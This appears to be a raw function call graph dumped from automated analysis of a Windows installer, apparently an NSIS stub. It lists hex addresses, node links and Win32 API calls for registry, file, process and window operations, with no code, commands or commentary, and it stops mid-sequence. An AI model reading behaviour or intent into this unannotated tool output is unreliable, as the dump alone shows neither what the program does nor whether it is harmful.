4065f7 2950->2955 2951->2950 2952->2950 2953 4065c4 CharNextW 2952->2953 2954 405bbc CharNextW 2952->2954 2956 4065b0 CharNextW 2952->2956 2957 4065bf CharNextW 2952->2957 2953->2950 2953->2952 2954->2952 2955->2905 2956->2952 2957->2953 2966 406127 2958->2966 2961 4061ec 2961->2945 2962 4061bc RegQueryValueExW RegCloseKey 2962->2961 2963->2945 2964->2945 2965->2934 2967 406136 2966->2967 2968 40613a 2967->2968 2969 40613f RegOpenKeyExW 2967->2969 2968->2961 2968->2962 2969->2968 2971 40533d 2970->2971 2980 401431 2970->2980 2972 405359 lstrlenW 2971->2972 2973 4062dc 17 API calls 2971->2973 2974 405382 2972->2974 2975 405367 lstrlenW 2972->2975 2973->2972 2977 405395 2974->2977 2978 405388 SetWindowTextW 2974->2978 2976 405379 lstrcatW 2975->2976 2975->2980 2976->2974 2979 40539b SendMessageW SendMessageW SendMessageW 2977->2979 2977->2980 2978->2977 2979->2980 2980->2920 2982 4066b0 2981->2982 2983 4066ba GetProcAddress 2981->2983 2987 406624 GetSystemDirectoryW 2982->2987 2985 405892 2983->2985 2985->2896 2986 4066b6 2986->2983 2986->2985 2988 406646 wsprintfW LoadLibraryExW 2987->2988 2988->2986 3669 401e49 3670 402c1f 17 API calls 3669->3670 3671 401e4f 3670->3671 3672 402c1f 17 API calls 3671->3672 3673 401e5b 3672->3673 3674 401e72 EnableWindow 3673->3674 3675 401e67 ShowWindow 3673->3675 3676 402ac5 3674->3676 3675->3676 3677 40264a 3678 402c1f 17 API calls 3677->3678 3682 402659 3678->3682 3679 4026a3 ReadFile 3679->3682 3689 402796 3679->3689 3680 405e33 ReadFile 3680->3682 3682->3679 3682->3680 3683 4026e3 MultiByteToWideChar 3682->3683 3684 402798 3682->3684 3686 402709 SetFilePointer MultiByteToWideChar 3682->3686 3687 4027a9 3682->3687 3682->3689 3690 405e91 SetFilePointer 3682->3690 3683->3682 3699 406201 wsprintfW 3684->3699 3686->3682 3688 4027ca SetFilePointer 3687->3688 3687->3689 3688->3689 3691 405ead 3690->3691 3694 405ec5 3690->3694 3692 405e33 ReadFile 3691->3692 3693 405eb9 3692->3693 3693->3694 3695 405ef6 SetFilePointer 3693->3695 3696 405ece SetFilePointer 3693->3696 3694->3682 3695->3694 3696->3695 3697 405ed9 3696->3697 3698 405e62 WriteFile 3697->3698 3698->3694 3699->3689 3252 4014cb 3253 405322 24 API calls 3252->3253 3254 4014d2 3253->3254 3700 4016cc 3701 402c41 17 API calls 3700->3701 3702 4016d2 GetFullPathNameW 3701->3702 3703 4016ec 3702->3703 3709 40170e 3702->3709 3705 4065fd 2 API calls 3703->3705 3703->3709 3704 401723 GetShortPathNameW 3706 402ac5 3704->3706 3707 4016fe 3705->3707 3707->3709 3710 4062ba lstrcpynW 3707->3710 3709->3704 3709->3706 3710->3709 3711 40234e 3712 402c41 17 API calls 3711->3712 3713 40235d 3712->3713 3714 402c41 17 API calls 3713->3714 3715 402366 3714->3715 3716 402c41 17 API calls 3715->3716 3717 402370 GetPrivateProfileStringW 3716->3717 3718 401b53 3719 402c41 17 API calls 3718->3719 3720 401b5a 3719->3720 3721 402c1f 17 API calls 3720->3721 3722 401b63 wsprintfW 3721->3722 3723 402ac5 3722->3723 3724 401956 3725 402c41 17 API calls 3724->3725 3726 40195d lstrlenW 3725->3726 3727 402592 3726->3727 3728 4014d7 3729 402c1f 17 API calls 3728->3729 3730 4014dd Sleep 3729->3730 3732 402ac5 3730->3732 3162 403d58 3163 403d70 3162->3163 3164 403eab 3162->3164 3163->3164 3165 403d7c 3163->3165 3166 403efc 3164->3166 3167 403ebc GetDlgItem GetDlgItem 3164->3167 3169 403d87 SetWindowPos 3165->3169 3170 403d9a 3165->3170 3168 403f56 3166->3168 3176 401389 2 API calls 3166->3176 3171 404231 18 API calls 3167->3171 3172 40427d SendMessageW 3168->3172 3193 403ea6 3168->3193 3169->3170 3173 403db7 3170->3173 3174 403d9f ShowWindow 3170->3174 3175 403ee6 SetClassLongW 3171->3175 3205 403f68 3172->3205 3177 403dd9 3173->3177 3178 403dbf DestroyWindow 3173->3178 3174->3173 3179 40140b 2 API calls 3175->3179 3180 403f2e 3176->3180 3181 403dde SetWindowLongW 3177->3181 3182 403def 3177->3182 3232 4041ba 3178->3232 3179->3166 3180->3168 3185 403f32 SendMessageW 3180->3185 3181->3193 3183 403e98 3182->3183 3184 403dfb GetDlgItem 3182->3184 3190 404298 8 API calls 3183->3190 3188 403e2b 3184->3188 3189 403e0e SendMessageW IsWindowEnabled 3184->3189 3185->3193 3186 40140b 2 API calls 3186->3205 3187 4041bc DestroyWindow EndDialog 3187->3232 3192 403e30 3188->3192 3195 403e38 3188->3195 3197 403e7f SendMessageW 3188->3197 3198 403e4b 3188->3198 3189->3188 3189->3193 3190->3193 3191 4041eb ShowWindow 3191->3193 3199 40420a SendMessageW 3192->3199 3194 4062dc 17 API calls 3194->3205 3195->3192 3195->3197 3196 404231 18 API calls 3196->3205 3197->3183 3201 403e53 3198->3201 3202 403e68 3198->3202 3200 403e66 3199->3200 3200->3183 3239 40140b 3201->3239 3203 40140b 2 API calls 3202->3203 3206 403e6f 3203->3206 3205->3186 3205->3187 3205->3193 3205->3194 3205->3196 3207 404231 18 API calls 3205->3207 3223 4040fc DestroyWindow 3205->3223 3206->3183 3206->3192 3208 403fe3 GetDlgItem 3207->3208 3209 404000 ShowWindow KiUserCallbackDispatcher 3208->3209 3210 403ff8 3208->3210 3233 404253 KiUserCallbackDispatcher 3209->3233 3210->3209 3212 40402a EnableWindow 3217 40403e 3212->3217 3213 404043 GetSystemMenu EnableMenuItem SendMessageW 3214 404073 SendMessageW 3213->3214 3213->3217 3214->3217 3217->3213 3234 404266 SendMessageW 3217->3234 3235 403d39 3217->3235 3238 4062ba lstrcpynW 3217->3238 3219 4040a2 lstrlenW 3220 4062dc 17 API calls 3219->3220 3221 4040b8 SetWindowTextW 3220->3221 3222 401389 2 API calls 3221->3222 3222->3205 3224 404116 CreateDialogParamW 3223->3224 3223->3232 3225 404149 3224->3225 3224->3232 3226 404231 18 API calls 3225->3226 3227 404154 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3226->3227 3228 401389 2 API calls 3227->3228 3229 40419a 3228->3229 3229->3193 3230 4041a2 ShowWindow 3229->3230 3231 40427d SendMessageW 3230->3231 3231->3232 3232->3191 3232->3193 3233->3212 3234->3217 3236 4062dc 17 API calls 3235->3236 3237 403d47 SetWindowTextW 3236->3237 3237->3217 3238->3219 3240 401389 2 API calls 3239->3240 3241 401420 3240->3241 3241->3192 3733 401f58 3734 402c41 17 API calls 3733->3734 3735 401f5f 3734->3735 3736 4065fd 2 API calls 3735->3736 3737 401f65 3736->3737 3739 401f76 3737->3739 3740 406201 wsprintfW 3737->3740 3740->3739 3741 402259 3742 402c41 17 API calls 3741->3742 3743 40225f 3742->3743 3744 402c41 17 API calls 3743->3744 3745 402268 3744->3745 3746 402c41 17 API calls 3745->3746 3747 402271 3746->3747 3748 4065fd 2 API calls 3747->3748 3749 40227a 3748->3749 3750 40228b lstrlenW lstrlenW 3749->3750 3751 40227e 3749->3751 3753 405322 24 API calls 3750->3753 3752 405322 24 API calls 3751->3752 3755 402286 3751->3755 3752->3755 3754 4022c9 SHFileOperationW 3753->3754 3754->3751 3754->3755 3756 4046db 3757 404711 3756->3757 3758 4046eb 3756->3758 3760 404298 8 API calls 3757->3760 3759 404231 18 API calls 3758->3759 3761 4046f8 SetDlgItemTextW 3759->3761 3762 40471d 3760->3762 3761->3757 3763 40175c 3764 402c41 17 API calls 3763->3764 3765 401763 3764->3765 3766 405ddf 2 API calls 3765->3766 3767 40176a 3766->3767 3767->3767 3768 401d5d GetDlgItem GetClientRect 3769 402c41 17 API calls 3768->3769 3770 401d8f LoadImageW SendMessageW 3769->3770 3771 402ac5 3770->3771 3772 401dad DeleteObject 3770->3772 3772->3771 3773 4022dd 3774 4022e4 3773->3774 3777 4022f7 3773->3777 3775 4062dc 17 API calls 3774->3775 3776 4022f1 3775->3776 3778 405920 MessageBoxIndirectW 3776->3778 3778->3777 2990 405461 2991 405482 GetDlgItem GetDlgItem GetDlgItem 2990->2991 2992 40560b 2990->2992 3035 404266 SendMessageW 2991->3035 2994 405614 GetDlgItem CreateThread CloseHandle 2992->2994 2995 40563c 2992->2995 2994->2995 3058 4053f5 OleInitialize 2994->3058 2997 405667 2995->2997 2998 405653 ShowWindow ShowWindow 2995->2998 2999 40568c 2995->2999 2996 4054f2 3002 4054f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 2996->3002 3000 4056c7 2997->3000 3004 4056a1 ShowWindow 2997->3004 3005 40567b 2997->3005 3040 404266 SendMessageW 2998->3040 3044 404298 2999->3044 3000->2999 3010 4056d5 SendMessageW 3000->3010 3008 405567 3002->3008 3009 40554b SendMessageW SendMessageW 3002->3009 3006 4056c1 3004->3006 3007 4056b3 3004->3007 3041 40420a 3005->3041 3013 40420a SendMessageW 3006->3013 3012 405322 24 API calls 3007->3012 3014 40557a 3008->3014 3015 40556c SendMessageW 3008->3015 3009->3008 3016 40569a 3010->3016 3017 4056ee CreatePopupMenu 3010->3017 3012->3006 3013->3000 3036 404231 3014->3036 3015->3014 3018 4062dc 17 API calls 3017->3018 3020 4056fe AppendMenuW 3018->3020 3022 40571b GetWindowRect 3020->3022 3023 40572e TrackPopupMenu 3020->3023 3021 40558a 3024 405593 ShowWindow 3021->3024 3025 4055c7 GetDlgItem SendMessageW 3021->3025 3022->3023 3023->3016 3027 405749 3023->3027 3028 4055b6 3024->3028 3029 4055a9 ShowWindow 3024->3029 3025->3016 3026 4055ee SendMessageW SendMessageW 3025->3026 3026->3016 3030 405765 SendMessageW 3027->3030 3039 404266 SendMessageW 3028->3039 3029->3028 3030->3030 3031 405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3030->3031 3033 4057a7 SendMessageW 3031->3033 3033->3033 3034 4057d0 GlobalUnlock SetClipboardData CloseClipboard 3033->3034 3034->3016 3035->2996 3037 4062dc 17 API calls 3036->3037 3038 40423c SetDlgItemTextW 3037->3038 3038->3021 3039->3025 3040->2997 3042 404211 3041->3042 3043 404217 SendMessageW 3041->3043 3042->3043 3043->2999 3045 40435b 3044->3045 3046 4042b0 GetWindowLongW 3044->3046 3045->3016 3046->3045 3047 4042c5 3046->3047 3047->3045 3048 4042f2 GetSysColor 3047->3048 3049 4042f5 3047->3049 3048->3049 3050 404305 SetBkMode 3049->3050 3051 4042fb SetTextColor 3049->3051 3052 404323 3050->3052 3053 40431d GetSysColor 3050->3053 3051->3050 3054 40432a SetBkColor 3052->3054 3055 404334 3052->3055 3053->3052 3054->3055 3055->3045 3056 404347 DeleteObject 3055->3056 3057 40434e CreateBrushIndirect 3055->3057 3056->3057 3057->3045 3065 40427d 3058->3065 3060 405418 3064 40543f 3060->3064 3068 401389 3060->3068 3061 40427d SendMessageW 3062 405451 OleUninitialize 3061->3062 3064->3061 3066 404295 3065->3066 3067 404286 SendMessageW 3065->3067 3066->3060 3067->3066 3070 401390 3068->3070 3069 4013fe 3069->3060 3070->3069 3071 4013cb MulDiv SendMessageW 3070->3071 3071->3070 3779 401563 3780 402a6b 3779->3780 3783 406201 wsprintfW 3780->3783 3782 402a70 3783->3782 3077 4023e4 3078 402c41 17 API calls 3077->3078 3079 4023f6 3078->3079 3080 402c41 17 API calls 3079->3080 3081 402400 3080->3081 3094 402cd1 3081->3094 3084 402ac5 3085 402438 3087 402444 3085->3087 3098 402c1f 3085->3098 3086 402c41 17 API calls 3090 40242e lstrlenW 3086->3090 3089 402463 RegSetValueExW 3087->3089 3101 403116 3087->3101 3092 402479 RegCloseKey 3089->3092 3090->3085 3092->3084 3095 402cec 3094->3095 3121 406155 3095->3121 3099 4062dc 17 API calls 3098->3099 3100 402c34 3099->3100 3100->3087 3102 40312f 3101->3102 3103 40315d 3102->3103 3130 403347 SetFilePointer 3102->3130 3125 403331 3103->3125 3107 4032ca 3109 40330c 3107->3109 3114 4032ce 3107->3114 3108 40317a GetTickCount 3110 4032b4 3108->3110 3117 4031c9 3108->3117 3112 403331 ReadFile 3109->3112 3110->3089 3111 403331 ReadFile 3111->3117 3112->3110 3113 403331 ReadFile 3113->3114 3114->3110 3114->3113 3115 405e62 WriteFile 3114->3115 3115->3114 3116 40321f GetTickCount 3116->3117 3117->3110 3117->3111 3117->3116 3118 403244 MulDiv wsprintfW 3117->3118 3128 405e62 WriteFile 3117->3128 3119 405322 24 API calls 3118->3119 3119->3117 3122 406164 3121->3122 3123 402410 3122->3123 3124 40616f RegCreateKeyExW 3122->3124 3123->3084 3123->3085 3123->3086 3124->3123 3131 405e33 ReadFile 3125->3131 3129 405e80 3128->3129 3129->3117 3130->3103 3132 403168 3131->3132 3132->3107 3132->3108 3132->3110 3133 4058e6 ShellExecuteExW 3784 404367 lstrcpynW lstrlenW 3242 402868 3243 402c41 17 API calls 3242->3243 3244 40286f FindFirstFileW 3243->3244 3245 402897 3244->3245 3248 402882 3244->3248 3250 406201 wsprintfW 3245->3250 3247 4028a0 3251 4062ba lstrcpynW 3247->3251 3250->3247 3251->3248 3785 401968 3786 402c1f 17 API calls 3785->3786 3787 40196f 3786->3787 3788 402c1f 17 API calls 3787->3788 3789 40197c 3788->3789 3790 402c41 17 API calls 3789->3790 3791 401993 lstrlenW 3790->3791 3793 4019a4 3791->3793 3792 4019e5 3793->3792 3797 4062ba lstrcpynW 3793->3797 3795 4019d5 3795->3792 3796 4019da lstrlenW 3795->3796 3796->3792 3797->3795 3798 403968 3799 403973 3798->3799 3800 403977 3799->3800 3801 40397a GlobalAlloc 3799->3801 3801->3800 3802 40166a 3803 402c41 17 API calls 3802->3803 3804 401670 3803->3804 3805 4065fd 2 API calls 3804->3805 3806 401676 3805->3806 3273 40176f 3274 402c41 17 API calls 3273->3274 3275 401776 3274->3275 3276 401796 3275->3276 3277 40179e 3275->3277 3315 4062ba lstrcpynW 3276->3315 3316 4062ba lstrcpynW 3277->3316 3280 40179c 3284 40654e 5 API calls 3280->3284 3281 4017a9 3317 405b8f lstrlenW CharPrevW 3281->3317 3302 4017bb 3284->3302 3288 4017cd CompareFileTime 3288->3302 3289 40188d 3291 405322 24 API calls 3289->3291 3290 401864 3292 405322 24 API calls 3290->3292 3301 401879 3290->3301 3294 401897 3291->3294 3292->3301 3293 4062ba lstrcpynW 3293->3302 3295 403116 31 API calls 3294->3295 3296 4018aa 3295->3296 3297 4018be SetFileTime 3296->3297 3299 4018d0 CloseHandle 3296->3299 3297->3299 3298 4062dc 17 API calls 3298->3302 3300 4018e1 3299->3300 3299->3301 3303 4018e6 3300->3303 3304 4018f9 3300->3304 3302->3288 3302->3289 3302->3290 3302->3293 3302->3298 3311 405d8b GetFileAttributesW 3302->3311 3314 405db0 GetFileAttributesW CreateFileW 3302->3314 3320 4065fd FindFirstFileW 3302->3320 3323 405920 3302->3323 3305 4062dc 17 API calls 3303->3305 3306 4062dc 17 API calls 3304->3306 3307 4018ee lstrcatW 3305->3307 3308 401901 3306->3308 3307->3308 3310 405920 MessageBoxIndirectW 3308->3310 3310->3301 3312 405daa 3311->3312 3313 405d9d SetFileAttributesW 3311->3313 3312->3302 3313->3312 3314->3302 3315->3280 3316->3281 3318 4017af lstrcatW 3317->3318 3319 405bab lstrcatW 3317->3319 3318->3280 3319->3318 3321 406613 FindClose 3320->3321 3322 40661e 3320->3322 3321->3322 3322->3302 3324 405935 3323->3324 3325 405981 3324->3325 3326 405949 MessageBoxIndirectW 3324->3326 3325->3302 3326->3325 3807 4027ef 3808 4027f6 3807->3808 3811 402a70 3807->3811 3809 402c1f 17 API calls 3808->3809 3810 4027fd 3809->3810 3812 40280c SetFilePointer 3810->3812 3812->3811 3813 40281c 3812->3813 3815 406201 wsprintfW 3813->3815 3815->3811 3816 4043f0 3817 404408 3816->3817 3821 404522 3816->3821 3822 404231 18 API calls 3817->3822 3818 40458c 3819 404656 3818->3819 3820 404596 GetDlgItem 3818->3820 3827 404298 8 API calls 3819->3827 3823 4045b0 3820->3823 3824 404617 3820->3824 3821->3818 3821->3819 3825 40455d GetDlgItem SendMessageW 3821->3825 3826 40446f 3822->3826 3823->3824 3830 4045d6 SendMessageW LoadCursorW SetCursor 3823->3830 3824->3819 3831 404629 3824->3831 3849 404253 KiUserCallbackDispatcher 3825->3849 3829 404231 18 API calls 3826->3829 3837 404651 3827->3837 3833 40447c CheckDlgButton 3829->3833 3853 40469f 3830->3853 3835 40463f 3831->3835 3836 40462f SendMessageW 3831->3836 3832 404587 3850 40467b 3832->3850 3847 404253 KiUserCallbackDispatcher 3833->3847 3835->3837 3838 404645 SendMessageW 3835->3838 3836->3835 3838->3837 3842 40449a GetDlgItem 3848 404266 SendMessageW 3842->3848 3844 4044b0 SendMessageW 3845 4044d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3844->3845 3846 4044cd GetSysColor 3844->3846 3845->3837 3846->3845 3847->3842 3848->3844 3849->3832 3851 404689 3850->3851 3852 40468e SendMessageW 3850->3852 3851->3852 3852->3818 3856 4058e6 ShellExecuteExW 3853->3856 3855 404605 LoadCursorW SetCursor 3855->3824 3856->3855 3857 401a72 3858 402c1f 17 API calls 3857->3858 3859 401a7b 3858->3859 3860 402c1f 17 API calls 3859->3860 3861 401a20 3860->3861 3072 401573 3073 401583 ShowWindow 3072->3073 3074 40158c 3072->3074 3073->3074 3075 402ac5 3074->3075 3076 40159a ShowWindow 3074->3076 3076->3075 3862 402df3 3863 402e05 SetTimer 3862->3863 3864 402e1e 3862->3864 3863->3864 3865 402e73 3864->3865 3866 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3864->3866 3866->3865 3867 401cf3 3868 402c1f 17 API calls 3867->3868 3869 401cf9 IsWindow 3868->3869 3870 401a20 3869->3870 3871 4014f5 SetForegroundWindow 3872 402ac5 3871->3872 3873 402576 3874 402c41 17 API calls 3873->3874 3875 40257d 3874->3875 3878 405db0 GetFileAttributesW CreateFileW 3875->3878 3877 402589 3878->3877 3879 401b77 3880 401bc8 3879->3880 3882 401b84 3879->3882 3883 401bf2 GlobalAlloc 3880->3883 3884 401bcd 3880->3884 3881 4022e4 3886 4062dc 17 API calls 3881->3886 3882->3881 3888 401b9b 3882->3888 3885 4062dc 17 API calls 3883->3885 3894 401c0d 3884->3894 3900 4062ba lstrcpynW 3884->3900 3885->3894 3887 4022f1 3886->3887 3892 405920 MessageBoxIndirectW 3887->3892 3898 4062ba lstrcpynW 3888->3898 3891 401bdf GlobalFree 3891->3894 3892->3894 3893 401baa 3899 4062ba lstrcpynW 3893->3899 3896 401bb9 3901 4062ba lstrcpynW 3896->3901 3898->3893 3899->3896 3900->3891 3901->3894 3902 404a78 3903 404aa4 3902->3903 3904 404a88 3902->3904 3906 404ad7 3903->3906 3907 404aaa SHGetPathFromIDListW 3903->3907 3913 405904 GetDlgItemTextW 3904->3913 3909 404ac1 SendMessageW 3907->3909 3910 404aba 3907->3910 3908 404a95 SendMessageW 3908->3903 3909->3906 3912 40140b 2 API calls 3910->3912 3912->3909 3913->3908 3914 4024f8 3924 402c81 3914->3924 3917 402c1f 17 API calls 3918 40250b 3917->3918 3919 402533 RegEnumValueW 3918->3919 3920 402527 RegEnumKeyW 3918->3920 3922 40288b 3918->3922 3921 402548 RegCloseKey 3919->3921 3920->3921 3921->3922 3925 402c41 17 API calls 3924->3925 3926 402c98 3925->3926 3927 406127 RegOpenKeyExW 3926->3927 3928 402502 3927->3928 3928->3917 3929 40167b 3930 402c41 17 API calls 3929->3930 3931 401682 3930->3931 3932 402c41 17 API calls 3931->3932 3933 40168b 3932->3933 3934 402c41 17 API calls 3933->3934 3935 401694 MoveFileW 3934->3935 3936 4016a7 3935->3936 3942 4016a0 3935->3942 3938 4065fd 2 API calls 3936->3938 3940 402250 3936->3940 3937 401423 24 API calls 3937->3940 3939 4016b6 3938->3939 3939->3940 3941 406080 36 API calls 3939->3941 3941->3942 3942->3937 3943 401e7d 3944 402c41 17 API calls 3943->3944 3945 401e83 3944->3945 3946 402c41 17 API calls 3945->3946 3947 401e8c 3946->3947 3948 402c41 17 API calls 3947->3948 3949 401e95 3948->3949 3950 402c41 17 API calls 3949->3950 3951 401e9e 3950->3951 3952 401423 24 API calls 3951->3952 3953 401ea5 3952->3953 3960 4058e6 ShellExecuteExW 3953->3960 3955 401ee7 3956 406745 5 API calls 3955->3956 3958 40288b 3955->3958 3957 401f01 CloseHandle 3956->3957 3957->3958 3960->3955 3961 4019ff 3962 402c41 17 API calls 3961->3962 3963 401a06 3962->3963 3964 402c41 17 API calls 3963->3964 3965 401a0f 3964->3965 3966 401a16 lstrcmpiW 3965->3966 3967 401a28 lstrcmpW 3965->3967 3968 401a1c 3966->3968 3967->3968 3969 401000 3970 401037 BeginPaint GetClientRect 3969->3970 3971 40100c DefWindowProcW 3969->3971 3973 4010f3 3970->3973 3974 401179 3971->3974 3975 401073 CreateBrushIndirect FillRect DeleteObject 3973->3975 3976 4010fc 3973->3976 3975->3973 3977 401102 CreateFontIndirectW 3976->3977 3978 401167 EndPaint 3976->3978 3977->3978 3979 401112 6 API calls 3977->3979 3978->3974 3979->3978 3980 401503 3981 40150b 3980->3981 3983 40151e 3980->3983 3982 402c1f 17 API calls 3981->3982 3982->3983 3984 402104 3985 402c41 17 API calls 3984->3985 3986 40210b 3985->3986 3987 402c41 17 API calls 3986->3987 3988 402115 3987->3988 3989 402c41 17 API calls 3988->3989 3990 40211f 3989->3990 3991 402c41 17 API calls 3990->3991 3992 402129 3991->3992 3993 402c41 17 API calls 3992->3993 3995 402133 3993->3995 3994 402172 CoCreateInstance 3999 402191 3994->3999 3995->3994 3996 402c41 17 API calls 3995->3996 3996->3994 3997 401423 24 API calls 3998 402250 3997->3998 3999->3997 3999->3998 4000 402484 4001 402c81 17 API calls 4000->4001 4002 40248e 4001->4002 4003 402c41 17 API calls 4002->4003 4004 402497 4003->4004 4005 4024a2 RegQueryValueExW 4004->4005 4008 40288b 4004->4008 4006 4024c8 RegCloseKey 4005->4006 4007 4024c2 4005->4007 4006->4008 4007->4006 4011 406201 wsprintfW 4007->4011 4011->4006 3134 401f06 3135 402c41 17 API calls 3134->3135 3136 401f0c 3135->3136 3137 405322 24 API calls 3136->3137 3138 401f16 3137->3138 3149 4058a3 CreateProcessW 3138->3149 3141 401f3f CloseHandle 3145 40288b 3141->3145 3144 401f31 3146 401f41 3144->3146 3147 401f36 3144->3147 3146->3141 3157 406201 wsprintfW 3147->3157 3150 401f1c 3149->3150 3151 4058d6 CloseHandle 3149->3151 3150->3141 3150->3145 3152 406745 WaitForSingleObject 3150->3152 3151->3150 3153 40675f 3152->3153 3154 406771 GetExitCodeProcess 3153->3154 3158 4066d0 3153->3158 3154->3144 3157->3141 3159 4066ed PeekMessageW 3158->3159 3160 4066e3 DispatchMessageW 3159->3160 3161 4066fd WaitForSingleObject 3159->3161 3160->3159 3161->3153 3255 401f8c 3256 402c41 17 API calls 3255->3256 3257 401f93 3256->3257 3258 406694 5 API calls 3257->3258 3259 401fa2 GetFileVersionInfoSizeW 3258->3259 3260 402ac5 3259->3260 3261 401fbe GlobalAlloc 3259->3261 3261->3260 3262 401fd2 3261->3262 3263 406694 5 API calls 3262->3263 3264 401fd9 3263->3264 3265 406694 5 API calls 3264->3265 3267 401fe3 3265->3267 3266 402026 3266->3260 3267->3266 3271 406201 wsprintfW 3267->3271 3269 402018 3272 406201 wsprintfW 3269->3272 3271->3269 3272->3266 4012 40190c 4013 401943 4012->4013 4014 402c41 17 API calls 4013->4014 4015 401948 4014->4015 4016 4059cc 67 API calls 4015->4016 4017 401951 4016->4017 4018 40230c 4019 402314 4018->4019 4023 40231a 4018->4023 4020 402c41 17 API calls 4019->4020 4020->4023 4021 402328 4022 402336 4021->4022 4025 402c41 17 API calls 4021->4025 4026 402c41 17 API calls 4022->4026 4023->4021 4024 402c41 17 API calls 4023->4024 4024->4021 4025->4022 4027 40233f WritePrivateProfileStringW 4026->4027 4028 40238e 4029 4023c1 4028->4029 4030 402396 4028->4030 4032 402c41 17 API calls 4029->4032 4031 402c81 17 API calls 4030->4031 4033 40239d 4031->4033 4034 4023c8 4032->4034 4036 4023d5 4033->4036 4037 402c41 17 API calls 4033->4037 4039 402cff 4034->4039 4038 4023ae RegDeleteValueW RegCloseKey 4037->4038 4038->4036 4040 402d0c 4039->4040 4041 402d13 4039->4041 4040->4036 4041->4040 4043 402d44 4041->4043 4044 406127 RegOpenKeyExW 4043->4044 4045 402d72 4044->4045 4046 402d98 RegEnumKeyW 4045->4046 4047 402daf RegCloseKey 4045->4047 4048 402dd0 RegCloseKey 4045->4048 4050 402d44 6 API calls 4045->4050 4053 402dc3 4045->4053 4046->4045 4046->4047 4049 406694 5 API calls 4047->4049 4048->4053 4051 402dbf 4049->4051 4050->4045 4052 402de0 RegDeleteKeyW 4051->4052 4051->4053 4052->4053 4053->4040 3327 40338f SetErrorMode GetVersion 3328 4033ce 3327->3328 3329 4033d4 3327->3329 3330 406694 5 API calls 3328->3330 3331 406624 3 API calls 3329->3331 3330->3329 3332 4033ea lstrlenA 3331->3332 3332->3329 3333 4033fa 3332->3333 3334 406694 5 API calls 3333->3334 3335 403401 3334->3335 3336 406694 5 API calls 3335->3336 3337 403408 3336->3337 3338 406694 5 API calls 3337->3338 3339 403414 #17 OleInitialize SHGetFileInfoW 3338->3339 3417 4062ba lstrcpynW 3339->3417 3342 403460 GetCommandLineW 3418 4062ba lstrcpynW 3342->3418 3344 403472 3345 405bbc CharNextW 3344->3345 3346 403497 CharNextW 3345->3346 3347 4035c1 GetTempPathW 3346->3347 3357 4034b0 3346->3357 3419 40335e 3347->3419 3349 4035d9 3350 403633 DeleteFileW 3349->3350 3351 4035dd GetWindowsDirectoryW lstrcatW 3349->3351 3429 402edd GetTickCount GetModuleFileNameW 3350->3429 3354 40335e 12 API calls 3351->3354 3352 405bbc CharNextW 3352->3357 3356 4035f9 3354->3356 3355 403647 3365 405bbc CharNextW 3355->3365 3399 4036ea 3355->3399 3412 4036fa 3355->3412 3356->3350 3358 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3356->3358 3357->3352 3359 4035ac 3357->3359 3361 4035aa 3357->3361 3360 40335e 12 API calls 3358->3360 3513 4062ba lstrcpynW 3359->3513 3363 40362b 3360->3363 3361->3347 3363->3350 3363->3412 3371 403666 3365->3371 3368 403834 3370 40383c GetCurrentProcess OpenProcessToken 3368->3370 3378 4038b8 ExitProcess 3368->3378 3369 403714 3372 405920 MessageBoxIndirectW 3369->3372 3376 403854 LookupPrivilegeValueW AdjustTokenPrivileges 3370->3376 3377 403888 3370->3377 3373 4036c4 3371->3373 3374 40372a 3371->3374 3375 403722 ExitProcess 3372->3375 3514 405c97 3373->3514 3381 40588b 5 API calls 3374->3381 3376->3377 3382 406694 5 API calls 3377->3382 3384 40372f lstrcatW 3381->3384 3385 40388f 3382->3385 3386 403740 lstrcatW 3384->3386 3387 40374b lstrcatW lstrcmpiW 3384->3387 3388 4038a4 ExitWindowsEx 3385->3388 3391 4038b1 3385->3391 3386->3387 3390 403767 3387->3390 3387->3412 3388->3378 3388->3391 3393 403773 3390->3393 3394 40376c 3390->3394 3395 40140b 2 API calls 3391->3395 3392 4036df 3529 4062ba lstrcpynW 3392->3529 3398 40586e 2 API calls 3393->3398 3397 4057f1 4 API calls 3394->3397 3395->3378 3400 403771 3397->3400 3401 403778 SetCurrentDirectoryW 3398->3401 3457 4039aa 3399->3457 3400->3401 3402 403793 3401->3402 3403 403788 3401->3403 3538 4062ba lstrcpynW 3402->3538 3537 4062ba lstrcpynW 3403->3537 3406 4062dc 17 API calls 3407 4037d2 DeleteFileW 3406->3407 3408 4037df CopyFileW 3407->3408 3414 4037a1 3407->3414 3408->3414 3409 403828 3410 406080 36 API calls 3409->3410 3410->3412 3530 4038d0 3412->3530 3413 4062dc 17 API calls 3413->3414 3414->3406 3414->3409 3414->3413 3415 4058a3 2 API calls 3414->3415 3416 403813 CloseHandle 3414->3416 3539 406080 MoveFileExW 3414->3539 3415->3414 3416->3414 3417->3342 3418->3344 3420 40654e 5 API calls 3419->3420 3422 40336a 3420->3422 3421 403374 3421->3349 3422->3421 3423 405b8f 3 API calls 3422->3423 3424 40337c 3423->3424 3425 40586e 2 API calls 3424->3425 3426 403382 3425->3426 3543 405ddf 3426->3543 3547 405db0 GetFileAttributesW CreateFileW 3429->3547 3431 402f1d 3456 402f2d 3431->3456 3548 4062ba lstrcpynW 3431->3548 3433 402f43 3549 405bdb lstrlenW 3433->3549 3437 402f54 GetFileSize 3438 403050 3437->3438 3455 402f6b 3437->3455 3554 402e79 3438->3554 3440 403059 3442 403089 GlobalAlloc 3440->3442 3440->3456 3566 403347 SetFilePointer 3440->3566 3441 403331 ReadFile 3441->3455 3565 403347 SetFilePointer 3442->3565 3444 4030bc 3446 402e79 6 API calls 3444->3446 3446->3456 3447 403072 3449 403331 ReadFile 3447->3449 3448 4030a4 3450 403116 31 API calls 3448->3450 3451 40307d 3449->3451 3453 4030b0 3450->3453 3451->3442 3451->3456 3452 402e79 6 API calls 3452->3455 3453->3453 3454 4030ed SetFilePointer 3453->3454 3453->3456 3454->3456 3455->3438 3455->3441 3455->3444 3455->3452 3455->3456 3456->3355 3458 406694 5 API calls 3457->3458 3459 4039be 3458->3459 3460 4039c4 3459->3460 3461 4039d6 3459->3461 3575 406201 wsprintfW 3460->3575 3462 406188 3 API calls 3461->3462 3463 403a06 3462->3463 3465 403a25 lstrcatW 3463->3465 3467 406188 3 API calls 3463->3467 3466 4039d4 3465->3466 3567 403c80 3466->3567 3467->3465 3470 405c97 18 API calls 